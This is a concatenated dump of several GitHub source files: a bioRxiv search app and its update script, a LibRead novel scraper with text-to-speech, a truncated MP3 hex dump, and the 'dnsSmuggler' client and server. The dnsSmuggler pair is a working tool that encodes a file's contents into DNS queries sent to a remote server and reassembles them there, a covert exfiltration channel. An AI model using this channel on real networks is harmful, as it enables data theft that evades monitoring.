if 'AI:' in LLM_answer:
LLM_answer = LLM_answer.split('AI: ')[1]
st.markdown(LLM_answer)
total_ai_time = time.time()-ai_gen_start
st.markdown(f'**Time to generate summary:** {total_ai_time:.2f} s')
# Create a Plotly figure
fig = px.scatter(
plot_df,
x="Date",
y="Score",
hover_data=["Title", "DOI"],
color='server',
title="Publication Times and Scores",
)
fig.update_traces(marker=dict(size=10))
# Customize hover text to display the title and link it to the DOI
fig.update_traces(
hovertemplate="<b>%{hovertext}</b>",
hovertext=plot_df.apply(lambda row: f"{row['Title']}", axis=1),
)
# Show the figure in the Streamlit app
st.plotly_chart(fig, use_container_width=True)
# Generate category counts for the pie chart
category_counts = plot_df["category"].value_counts().reset_index()
category_counts.columns = ["category", "count"]
# Create a pie chart with Plotly Express
fig = px.pie(
category_counts,
values="count",
names="category",
title="Category Distribution",
)
# Show the pie chart in the Streamlit app
st.plotly_chart(fig, use_container_width=True)
st.markdown(
"""
<div style='text-align: center;'>
<b>Developed by <a href="https://www.dzyla.com/" target="_blank">Dawid Zyla</a></b>
<br>
<a href="https://github.com/dzyla/biorxiv_search" target="_blank">Source code on GitHub</a>
</div>
""",
unsafe_allow_html=True,
)
| 24,189 | Python | .py | 516 | 36.325581 | 300 | 0.616448 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,186 | update_database.py | dzyla_biorxiv_search/update_database.py | import pandas as pd
import numpy as np
from pathlib import Path
import requests
import json
import os
from datetime import datetime
from dateutil.relativedelta import relativedelta
from concurrent.futures import ThreadPoolExecutor, as_completed
from sentence_transformers import SentenceTransformer, models
import torch
import shutil
import dropbox
import streamlit as st
def load_data_embeddings():
existing_data_path = "aggregated_data"
new_data_directory = "db_update"
existing_embeddings_path = "biorxiv_ubin_embaddings.npy"
updated_embeddings_directory = "embed_update"
# Load existing database and embeddings
df_existing = pd.read_parquet(existing_data_path)
embeddings_existing = np.load(existing_embeddings_path, allow_pickle=True)
# Prepare lists to collect new updates
df_updates_list = []
embeddings_updates_list = []
# Ensure pairing of new data and embeddings by their matching filenames
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
for data_file in new_data_files:
# Assuming naming convention allows direct correlation
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
# Load and append DataFrame and embeddings
df_updates_list.append(pd.read_parquet(data_file))
embeddings_updates_list.append(np.load(corresponding_embedding_file))
else:
print(f"No corresponding embedding file found for {data_file.name}")
# Concatenate all updates
if df_updates_list:
df_updates = pd.concat(df_updates_list)
else:
df_updates = pd.DataFrame()
if embeddings_updates_list:
embeddings_updates = np.vstack(embeddings_updates_list)
else:
embeddings_updates = np.array([])
# Append new data to existing, handling duplicates as needed
df_combined = pd.concat([df_existing, df_updates])
# create a mask for filtering
mask = ~df_combined.duplicated(subset=["title"], keep="last")
df_combined = df_combined[mask]
# Combine embeddings, ensuring alignment with the DataFrame
embeddings_combined = (
np.vstack([embeddings_existing, embeddings_updates])
if embeddings_updates.size
else embeddings_existing
)
# filter the embeddings based on dataframe unique entries
embeddings_combined = embeddings_combined[mask]
return df_combined, embeddings_combined
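# Expected on-disk layout for the incremental update (a sketch based on the paths above; the
# db_update/embed_update file names are examples only, any matching parquet/npy stems work):
#     aggregated_data/                               <- existing parquet dataset
#     biorxiv_ubin_embaddings.npy                    <- existing embeddings, row-aligned with it
#     db_update/details_data_240101_240131.parquet   <- a new metadata block
#     embed_update/details_data_240101_240131.npy    <- embeddings for the same stem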
# Fast fetch data from bioRxiv
def fetch_and_save_data_block(endpoint, server, block_start, block_end, save_directory, format='json'):
base_url = f"https://api.biorxiv.org/{endpoint}/{server}/"
block_interval = f"{block_start.strftime('%Y-%m-%d')}/{block_end.strftime('%Y-%m-%d')}"
block_data = []
cursor = 0
continue_fetching = True
while continue_fetching:
url = f"{base_url}{block_interval}/{cursor}/{format}"
response = requests.get(url)
if response.status_code != 200:
print(f"Failed to fetch data for block {block_interval} at cursor {cursor}. HTTP Status: {response.status_code}")
break
data = response.json()
fetched_papers = len(data['collection'])
if fetched_papers > 0:
block_data.extend(data['collection'])
cursor += fetched_papers # Update the cursor to fetch next set of data
print(f"Fetched {fetched_papers} papers for block {block_interval}. Total fetched: {cursor}.")
else:
continue_fetching = False
if block_data:
save_data_block(block_data, block_start, block_end, endpoint, save_directory)
def save_data_block(block_data, start_date, end_date, endpoint, save_directory):
start_yymmdd = start_date.strftime("%y%m%d")
end_yymmdd = end_date.strftime("%y%m%d")
filename = f"{save_directory}/{endpoint}_data_{start_yymmdd}_{end_yymmdd}.json"
with open(filename, 'w') as file:
json.dump(block_data, file, indent=4)
print(f"Saved data block to {filename}")
def fetch_data(endpoint, server, interval, save_directory, format='json'):
os.makedirs(save_directory, exist_ok=True)
start_date, end_date = [datetime.strptime(date, "%Y-%m-%d") for date in interval.split('/')]
current_date = start_date
tasks = []
with ThreadPoolExecutor(max_workers=12) as executor: # Adjust the number of workers as needed
while current_date <= end_date:
block_start = current_date
block_end = min(current_date + relativedelta(months=1) - relativedelta(days=1), end_date)
tasks.append(executor.submit(fetch_and_save_data_block, endpoint, server, block_start, block_end, save_directory, format))
current_date += relativedelta(months=1)
for future in as_completed(tasks):
future.result()
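# Example invocation (illustrative only; any "YYYY-MM-DD/YYYY-MM-DD" interval works):
#     fetch_data("details", "biorxiv", "2024-01-01/2024-03-31", "db_update_json")
# Each one-month block is fetched in its own thread and written to a separate JSON file.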
def load_json_to_dataframe(json_file):
"""Load JSON data from a file into a pandas DataFrame."""
with open(json_file, 'r') as file:
data = json.load(file)
return pd.DataFrame(data)
def save_dataframe(df, save_path):
"""Save DataFrame to a file in Parquet format."""
df.to_parquet(save_path)
def process_json_files(directory, save_directory):
"""Process each JSON file in a directory and save its data to a Parquet file with a corresponding name."""
# Ensure the save directory exists
os.makedirs(save_directory, exist_ok=True)
json_files = list(Path(directory).glob('*.json'))
print(f'json_files {type(json_files)}: {json_files}')
for json_file in json_files:
df = load_json_to_dataframe(json_file)
# Optionally perform any data cleaning or preprocessing here
# Derive Parquet filename from JSON filename
parquet_filename = f"{json_file.stem}.parquet"
save_path = os.path.join(save_directory, parquet_filename)
        # If this parquet block already exists, remove its stale embedding so it gets re-computed
if os.path.exists(save_path):
npy_file_path = save_path.replace('db_update', 'embed_update').replace('parquet', 'npy')
if os.path.exists(npy_file_path):
os.remove(npy_file_path)
print(f'Removed embedding file {npy_file_path} due to the dataframe update')
# Save the DataFrame to Parquet format
save_dataframe(df, save_path)
print(f"Processed and saved {json_file.name} to {parquet_filename}")
def load_unprocessed_parquets(db_update_directory, embed_update_directory):
"""
Load Parquet files from db_update_directory that do not have a corresponding
.npy file in embed_update_directory.
Parameters:
- db_update_directory: Path to the directory containing the Parquet files.
- embed_update_directory: Path to the directory containing the .npy files.
Returns:
    - A list of paths to the unprocessed Parquet files.
"""
# Convert string paths to Path objects for easier manipulation
db_update_directory = Path(db_update_directory)
embed_update_directory = Path(embed_update_directory)
# List all Parquet files in db_update_directory
parquet_files = list(db_update_directory.glob('*.parquet'))
# List all .npy files in embed_update_directory and strip extensions for comparison
npy_files = {f.stem for f in embed_update_directory.glob('*.npy')}
# Initialize an empty list to store loaded DataFrames from unprocessed Parquet files
unprocessed_dataframes = []
# Loop through Parquet files and load those without a corresponding .npy file
for parquet_file in parquet_files:
if parquet_file.stem not in npy_files:
# Load the Parquet file as a pandas DataFrame and add it to the list
#df = pd.read_parquet(parquet_file)
unprocessed_dataframes.append(parquet_file)
print(f"Loaded unprocessed Parquet file: {parquet_file.name}")
else:
print(f"Skipping processed Parquet file: {parquet_file.name}")
return unprocessed_dataframes
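# Example (illustrative only): with db_update/a.parquet, db_update/b.parquet and embed_update/a.npy
# on disk, the call below returns [Path("db_update/b.parquet")], i.e. only the file that still
# lacks an embedding:
#     pending = load_unprocessed_parquets("db_update", "embed_update")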
def connect_to_dropbox():
dropbox_APP_KEY = st.secrets["dropbox_APP_KEY"]
dropbox_APP_SECRET = st.secrets["dropbox_APP_SECRET"]
dropbox_REFRESH_TOKEN = st.secrets["dropbox_REFRESH_TOKEN"]
    dbx = dropbox.Dropbox(
app_key = dropbox_APP_KEY,
app_secret = dropbox_APP_SECRET,
oauth2_refresh_token = dropbox_REFRESH_TOKEN
)
return dbx
def upload_path(local_path, dropbox_path):
dbx = connect_to_dropbox()
local_path = Path(local_path)
if local_path.is_file():
relative_path = local_path.name
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_path, dropbox_file_path, dbx)
elif local_path.is_dir():
for local_file in local_path.rglob('*'):
if local_file.is_file():
relative_path = local_file.relative_to(local_path.parent)
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_file, dropbox_file_path, dbx)
else:
print("The provided path does not exist.")
def upload_file(file_path, dropbox_file_path, dbx):
try:
# Normalize the path for Dropbox API
dropbox_file_path = dropbox_file_path.replace('\\', '/')
# Check if the file exists on Dropbox and get metadata
try:
metadata = dbx.files_get_metadata(dropbox_file_path)
dropbox_mod_time = metadata.server_modified
local_mod_time = datetime.fromtimestamp(file_path.stat().st_mtime)
# Skip upload if the Dropbox file is newer or the same age
if dropbox_mod_time >= local_mod_time:
print(f"Skipped {dropbox_file_path}, Dropbox version is up-to-date.")
return
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.GetMetadataError) or e.error.is_path() and e.error.get_path().is_not_found():
print(f"No existing file on Dropbox, proceeding with upload: {dropbox_file_path}")
else:
raise e
# Proceed with uploading if file does not exist or is outdated
with file_path.open('rb') as f:
dbx.files_upload(f.read(), dropbox_file_path, mode=dropbox.files.WriteMode.overwrite)
print(f"Uploaded {dropbox_file_path}")
except Exception as e:
print(f"Failed to upload {dropbox_file_path}: {str(e)}")
endpoint = "details"
server = "biorxiv"
df, embeddings = load_data_embeddings()
start_date = df['date'].max()
last_date = datetime.today().strftime('%Y-%m-%d')
interval = f'{start_date}/{last_date}'
print(f'using interval: {interval}')
save_directory = "db_update_json"
fetch_data(endpoint, server, interval, save_directory)
directory = r'db_update_json' # Directory containing JSON files
save_directory = r'db_update' # Directory to save aggregated data
process_json_files(directory, save_directory)
db_update_directory = 'db_update'
embed_update_directory = 'embed_update'
unprocessed_dataframes = load_unprocessed_parquets(db_update_directory, embed_update_directory)
if unprocessed_dataframes:
for file in unprocessed_dataframes:
df = pd.read_parquet(file)
query = df['abstract'].tolist()
device = "cuda" if torch.cuda.is_available() else "cpu"
model = SentenceTransformer("mixedbread-ai/mxbai-embed-large-v1")
model.to(device)
query_embedding = model.encode(query, normalize_embeddings=True, precision='ubinary', show_progress_bar=True)
file_path=os.path.basename(file).split('.')[0]
embeddings_path = f'embed_update/{file_path}'
np.save(embeddings_path, query_embedding)
print(f'Saved embeddings {embeddings_path}')
# remove old json directory
db_update_json = 'db_update_json'
shutil.rmtree(db_update_json)
print(f"Directory '{db_update_json}' and its contents have been removed.")
for path in ['db_update', 'embed_update']:
upload_path(path, '//')
else:
print('Nothing to do')
| 12,711 | Python | .py | 251 | 42 | 135 | 0.671076 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,187 | client.py | 0x7sec_dnsSmuggler/client.py | import sys
import socket
import base64
import time
# Constants
PAYLOAD_SIZE = 32 # Maximum payload size for DNS query
DOMAIN_SUFFIX = ".example.com" # Suffix for the domain name
def read_file(filename):
try:
with open(filename, 'rb') as file:
content = file.read()
return content
except FileNotFoundError:
print("Error: File not found.")
sys.exit(1)
def create_dns_query(data, index):
data_chunk = data[index : index + PAYLOAD_SIZE]
data_b64 = base64.b64encode(data_chunk).decode()
query = f"{data_b64}.{index}{DOMAIN_SUFFIX}"
return query
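# Example of the generated name (illustrative only): a chunk whose base64 encoding is
# "aGVsbG8gd29ybGQ=" (i.e. b"hello world") at byte offset 0 becomes
#     "aGVsbG8gd29ybGQ=.0.example.com"
# i.e. <base64 payload>.<byte offset><DOMAIN_SUFFIX>.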
def send_dns_query(query, server_ip):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(query.encode(), (server_ip, 53))
sock.close()
def main():
if len(sys.argv) != 3:
print("Usage: python client.py <file_name> <server_ip>")
sys.exit(1)
filename = sys.argv[1]
server_ip = sys.argv[2]
# Read file content
file_content = read_file(filename)
total_size = len(file_content)
print(f"Total number of packets to send: {total_size // PAYLOAD_SIZE + 1}")
# Send data in chunks
index = 0
while index < total_size:
query = create_dns_query(file_content, index)
print(f"Sending packet {index // PAYLOAD_SIZE + 1} out of {total_size // PAYLOAD_SIZE + 1}")
print("Data sent:", query)
send_dns_query(query, server_ip)
index += PAYLOAD_SIZE
time.sleep(1)
print("File sent successfully.")
if __name__ == "__main__":
main()
| 1,574 | Python | .py | 46 | 28.717391 | 100 | 0.644693 | 0x7sec/dnsSmuggler | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,188 | server.py | 0x7sec_dnsSmuggler/server.py | import socket
import base64
import random
import string
# Constants
MAX_CHUNK_SIZE = 32 # Maximum chunk size
DOMAIN_SUFFIX = ".example.com" # Suffix for the domain name
def process_dns_query(query_data):
parts = query_data.split(b'.')
data_b64 = parts[0]
index = int(parts[1])
data_chunk = base64.b64decode(data_b64)
return index, data_chunk
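# Example (illustrative only): the client-side name "aGVsbG8gd29ybGQ=.0.example.com" arrives as raw
# bytes; splitting on b'.' yields the base64 payload and the byte offset, so this returns
# (0, b"hello world"). Standard base64 never contains '.', so the split is unambiguous.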
def save_to_file(data_chunks):
random_string = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
filename = f"received_{random_string}.txt"
with open(filename, 'ab') as file:
for index, data_chunk in sorted(data_chunks.items()):
file.write(data_chunk)
def main():
server_ip = '0.0.0.0' # Listen on all interfaces
server_port = 53
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((server_ip, server_port))
print("Server listening...")
data_chunks = {}
expected_index = 0
total_packets = 0
while True:
data, addr = sock.recvfrom(1024)
total_packets += 1
index, data_chunk = process_dns_query(data)
print(f"Received packet {index + 1}")
print("Data received:", data_chunk.decode()) # Print the received data chunk
if index == expected_index:
data_chunks[index] = data_chunk
expected_index += len(data_chunk)
else:
print(f"Missing chunk: {expected_index}")
continue
# Check if there are any missing chunks
while expected_index in data_chunks:
expected_index += len(data_chunks[expected_index])
if len(data_chunk) < MAX_CHUNK_SIZE:
break
save_to_file(data_chunks)
print("File received and saved.")
print(f"Total number of packets received: {total_packets}")
sock.close()
if __name__ == "__main__":
main()
| 1,855 | Python | .py | 51 | 30 | 87 | 0.643575 | 0x7sec/dnsSmuggler | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,189 | libread-tool.py | Spectre-hidN_LibRead-Tool/src/libread-tool.py | import sys
import os
import shutil
import time
import asyncio
import configparser
from pynput import keyboard
from pywinctl import getActiveWindow
from utils.scrapper import checkConnection, search, getMetadata, getArticle
from utils.Prettify import clearScreen, Prettify, clearLine
from utils.tts import createTTSFromFile, createTTSFromText
from utils.configGenerator import create_default_config
from utils.ffmpegWrapper import performSanityCheck, mergeChunks
CONFIG_FILE = "libread-config.ini"
# Global variables. Values are taken from the config file
DOMAIN_NAME = COVER_IMAGE_NAME = OUTPUT_FILE_NAME = REPLACEMENT_CHARACTER = ""
FORCE_USE_M1 = False
PART_REPLACEMENT = True
# global function declaration for simplicity
printInf = Prettify.printInf
printWar = Prettify.printWar
printErr = Prettify.printErr
printSuc = Prettify.printSuc
printFeaturedText = Prettify.printFeaturedText
progressBar = Prettify().progressBar
def _readConfig():
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global DOMAIN_NAME, COVER_IMAGE_NAME, OUTPUT_FILE_NAME, REPLACEMENT_CHARACTER, FORCE_USE_M1, PART_REPLACEMENT
DOMAIN_NAME = config.get("DOMAIN", "domainName")
COVER_IMAGE_NAME = config.get("NOMENCLATURES", "coverImageNomenclature")
OUTPUT_FILE_NAME = config.get("NOMENCLATURES", "outputNomenclature")
REPLACEMENT_CHARACTER = config.get("NOMENCLATURES", "whitespaceReplacementCharacter")
FORCE_USE_M1 = config.getboolean("TTS_CONFIG", "forceGrabFirstThenConvert")
PART_REPLACEMENT = config.getboolean("TTS_CONFIG", "replacePartContents")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
time.sleep(2)
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
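# Shape of libread-config.ini that _readConfig expects (section and key names come from the code
# above; the values shown are placeholders, the real defaults are written by
# utils.configGenerator.create_default_config):
#     [DOMAIN]
#     domainName = <libread domain>
#     [NOMENCLATURES]
#     coverImageNomenclature = !TITLE!
#     outputNomenclature = !TITLE! ~ Chapter-!STARTCHAPTER!-!ENDCHAPTER!
#     whitespaceReplacementCharacter =
#     [TTS_CONFIG]
#     forceGrabFirstThenConvert = false
#     replacePartContents = true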
if __name__ == "__main__":
if os.name == 'nt':
os.system("title LibRead-Tool")
else:
os.system('echo -en "\033]0;LibRead-Tool\a"')
clearScreen()
if os.name == 'nt':
os.system("echo \033[38;5;12m\033[0m\r")
print("""\033[38;5;78m _ _ _ ______ _ _______ _ \033[0m
\033[38;5;78m(_) (_)| | (_____ \ | | (_______) | | \033[0m
\033[38;5;78m _ _ | |__ _____) ) _____ _____ __| | _____ _ ___ ___ | | \033[0m
\033[38;5;78m| | | || _ \ | __ / | ___ |(____ | / _ |(_____)| | / _ \ / _ \ | | \033[0m
| |_____ | || |_) )| | \ \ | ____|/ ___ |( (_| | | || |_| || |_| || |
|_______)|_||____/ |_| |_||_____)\_____| \____| |_| \___/ \___/ \_)
""")
_readConfig()
if(not PART_REPLACEMENT):
printFeaturedText("Content replacement is disabled! The LibRead Tool will not overwrite the existing parts before converting.")
print("Checking connection with libread...")
time.sleep(2)
if(checkConnection()):
printSuc("Connection established with libread successfully!")
else:
printErr("Error occured while connecting to libread! Check your Internet connection or firewall settings.")
sys.exit(100)
canUseM2ForTTS = False
if performSanityCheck():
canUseM2ForTTS = True
if(FORCE_USE_M1 or not PART_REPLACEMENT):
canUseM2ForTTS = False
print("\n")
query = input("Type to search something: ")
results = search(query=query)
selectedIndex = -1
if(len(results) == 0):
printWar(f"No results found for the query '{query}'. Try any other keywords!")
input()
sys.exit(404)
elif(len(results) == 1):
printSuc(f"1 hit found for the query '{query}'. Automatically selecting it...")
selectedIndex = 1
else:
printSuc(f"Multiple hits found for the query '{query}'. Select the desired index...")
i = 0
print("\n\033[38;5;162mIndex\033[0m ---- \033[38;5;183mTitle\033[0m")
for tag in results:
print(f"\033[38;5;162m{i+1}\033[0m ---- \033[38;5;183m{tag['title']}\033[0m") if i < 9 else print(f"\033[38;5;162m{i+1}\033[0m ---- \033[38;5;183m{tag['title']}\033[0m")
i+=1
try:
selectedIndex = int(input("Type the desired index from the above list: "))
except:
printErr("Invalid integer value! Aborting...")
sys.exit(200)
    if(selectedIndex > len(results) or selectedIndex < 1):
        printWar("Index doesn't exist! Automatically selecting the last index...")
        selectedIndex = len(results)
    selectedIndex -= 1
novelLink = f"https://{DOMAIN_NAME}" + results[selectedIndex]['href']
print(f"\nSelected: {results[selectedIndex]['title']} || URL: {novelLink}")
printInf(f"Getting metadata about {results[selectedIndex]['title']} from libread...")
time.sleep(3)
metadataResult = getMetadata(novelLink)
totalChapters = len(metadataResult['chapters'])
print(f"Total chapters found: \033[38;5;63m{len(metadataResult['chapters'])}\033[0m")
print(f"Status: \033[38;5;51m{metadataResult['status']}\033[0m")
print()
startChapter = 1
endChapter = totalChapters
jump = 10
try:
startChapter = int(input("Mention the starting chapter [default = 1]: "))
        if(startChapter > totalChapters):
            printWar("Starting chapter number exceeded total chapters found!")
            printInf("Setting starting chapter to 1...")
            startChapter = 1
else:
printInf(f"Setting starting chapter to {startChapter}...")
except:
printWar("Invalid input detected!")
printInf("Setting starting chapter to 1...")
try:
endChapter = int(input(f"Mention the last chapter [default = {totalChapters}]: "))
        if(endChapter < startChapter):
            printWar("Ending chapter number is less than the starting chapter!")
            printInf(f"Setting ending chapter to {totalChapters}...")
            endChapter = totalChapters
else:
printInf(f"Setting Ending chapter to {endChapter}...")
except:
printWar("Invalid input detected!")
printInf(f"Setting Ending chapter to {totalChapters}...")
try:
jump = int(input("Mention number of chapters in each part [default = 10]: "))
if(jump > 30):
printWar("Too many chapters detected in single part! Expect abnormal behaviour.")
except:
pass
isPause = False
pauseInput = input("Do you want to pause after each part? (y/n): ")
isPause = True if pauseInput == "y" else False
if(isPause):
printInf("Process will pause after each part! Press 'R' to resume.")
isTTS = False
ttsInput = input("Do you want to convert text to speech? (y/n): ")
isTTS = True if ttsInput == "y" else False
if(isTTS):
printInf("Texts will be converted to speech.")
#Create a directory for saving the files
if(not os.path.isdir(results[selectedIndex]['title']) and not os.path.isdir("Articles")):
try:
os.mkdir(results[selectedIndex]['title'])
except:
os.mkdir("Articles")
#save cover image
imageName = COVER_IMAGE_NAME.replace("!TITLE!", results[selectedIndex]['title']) + '.jpg'
if(REPLACEMENT_CHARACTER != ""):
imageName = imageName.replace(" ", REPLACEMENT_CHARACTER)
if(metadataResult["cover-image"]!=None):
printInf("\nSaving cover image...")
try:
with open(f"{results[selectedIndex]['title']}/{imageName}", 'wb') as bf:
for chunk in metadataResult['cover-image']:
bf.write(chunk)
bf.close()
except:
with open(f"Articles/{imageName}", 'wb') as bf:
for chunk in metadataResult['cover-image']:
bf.write(chunk)
bf.close()
time.sleep(1)
printSuc(f"Cover image saved as {results[selectedIndex]['title']}/{imageName}")
part = 1
progress = 0
printInf("Getting articles from libread...")
for i in range(startChapter-2, endChapter, jump):
mergedArticle = ""
for j in range(i+1, i+jump+1):
if(j>endChapter-1):
break
articleLink = f"https://{DOMAIN_NAME}" + metadataResult['chapters'][j]['href']
article = getArticle(articleLink)
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There")
# use M2 for TTS
if(isTTS and canUseM2ForTTS):
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;141m[CONVERTING]\033[0m {Chapter - {0}}".replace("{0}", str(j+1)))
# Create the enviroment for the current cycle
wd = results[selectedIndex]['title'] + "/.OPD"
if not os.path.isdir(wd): os.mkdir(wd)
try:
asyncio.run(createTTSFromText(text=article, outputPath=(wd+f"/Chapter-{str(j+1)}.mp3"), coverImagePath=f"{results[selectedIndex]['title']}/{imageName}"))
except Exception as E:
printErr(f"Fatal Exception occured during conversion. Couldn't proceed further with TTS. {E}")
isTTs = False
mergedArticle += article + "\n\n"
progress += 1
endChapterName = i+jump+1
if(i+jump+1 > endChapter):
endChapterName = endChapter
#results[selectedIndex]['title']} ~ Chapter-{i+2}-{endChapterName}
actualOutputFileName = OUTPUT_FILE_NAME.replace("!TITLE!", results[selectedIndex]['title']).replace("!STARTCHAPTER!", str((i+2))).replace("!ENDCHAPTER!", str(endChapterName))
if(REPLACEMENT_CHARACTER != ""):
actualOutputFileName = actualOutputFileName.replace(" ", REPLACEMENT_CHARACTER)
if(i+1 < endChapter):
try:
if (not PART_REPLACEMENT and os.path.isfile(f"{results[selectedIndex]['title']}/{actualOutputFileName}.txt")):
pass
else:
with open(f"{results[selectedIndex]['title']}/{actualOutputFileName}.txt", "w", encoding='utf-8') as f:
f.write(mergedArticle)
f.close()
except:
if(not PART_REPLACEMENT and os.path.isfile(f"Articles/{actualOutputFileName}.txt")):
pass
else:
with open(f"Articles/{actualOutputFileName}.txt", "w", encoding='utf-8') as f:
f.write(mergedArticle)
f.close()
# merge converted chunks and delete the opd folder
if(isTTS and canUseM2ForTTS):
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;87m[CONCATENATING]\033[0m ")
mergeChunks(chunkFilesDir=results[selectedIndex]['title'] + "/.OPD",
outputFilePrefix=f"{results[selectedIndex]['title']}/{actualOutputFileName}",
coverImagePath=f"{results[selectedIndex]['title']}/{imageName}")
shutil.rmtree(results[selectedIndex]['title'] + "/.OPD")
if(isTTS and not canUseM2ForTTS):
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;141m[CONVERTING]\033[0m {Chapter: {startChapter}-{EndChapter}}".replace("{startChapter}", str(i+2)).replace("{EndChapter}", str(endChapterName)))
try:
asyncio.run(createTTSFromFile(filepath=f"{results[selectedIndex]['title']}/{actualOutputFileName}.txt", outputFilePrefix=f"{results[selectedIndex]['title']}/{actualOutputFileName}", coverImagePath=f"{results[selectedIndex]['title']}/{imageName}"))
except:
try:
asyncio.run(createTTSFromFile(filepath=f"Articles/{actualOutputFileName}.txt", outputFilePrefix=f"Articles/{actualOutputFileName}", coverImagePath=f"Articles/{imageName}"))
except Exception as E:
printErr("\nFatal error Occured while converting text to speech! Couldn't proceed further with TTS. {E}")
# breaks on Windows and wayland
if(isPause and progress != ((endChapter-startChapter))+1):
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;226m[PAUSED]\033[0m ")
def pause_process():
with keyboard.Events() as events:
event = events.get(1e6)
if("libread-tool" in (" " + getActiveWindow().title.lower() + " ") or "visual studio code" in getActiveWindow().title.lower()):
if(event.key == keyboard.KeyCode.from_char('r')):
return
else:
event = None
pause_process()
else:
event = None
pause_process()
pause_process()
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There ")
clearLine()
print()
printFeaturedText("Fetched all chapters successfully!", msgColorCode=105, blinkersColorCode=46)
print(f"All chapters are stored inside the {results[selectedIndex]['title']} directory.")
input()
| 14,008 | Python | .py | 263 | 42.178707 | 281 | 0.600295 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,190 | twoSecondSilence.py | Spectre-hidN_LibRead-Tool/src/utils/twoSecondSilence.py | import binascii
"""
Get the raw bytes for the file https://github.com/anars/blank-audio/blob/master/2-seconds-of-silence.mp3
NOTE -> This is a ridiculous way to extract data. But, I didn't want to include the file as a resource
"""
def getFileBytes():
xxdDump = """49443304000000021805544954320000001500000032205365636f6e6473
206f662053696c656e63655450453100000012000000416e617220536f66
7477617265204c4c4354414c420000000c000000426c616e6b2041756469
6f4150494300020f02000000696d6167652f6a70656700030089504e470d
0a1a0a0000000d4948445200000438000004380806000000ec106c8f0000
0006624b474400ff00ff00ffa0bda79300000009704859730000083d0000
083d01059555b60000000774494d4507df0a0b051c31036f047600002000
4944415478daecdd7b945565dd07f0df300c3701012f28ea8089572c53b0
34b1a2326f81562ade354d5108336995a6a6a879ebe22d35afa4af809acb
d4340d0d4359bd967929bca46472d11004811161b88cf3fed15b0b9c9973
ce9e3967e63c339fcf5aef7a6bef673f7befdfb3cf70ceb767ef5d1111f5
0100000090b04e4a00000000a44ec001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
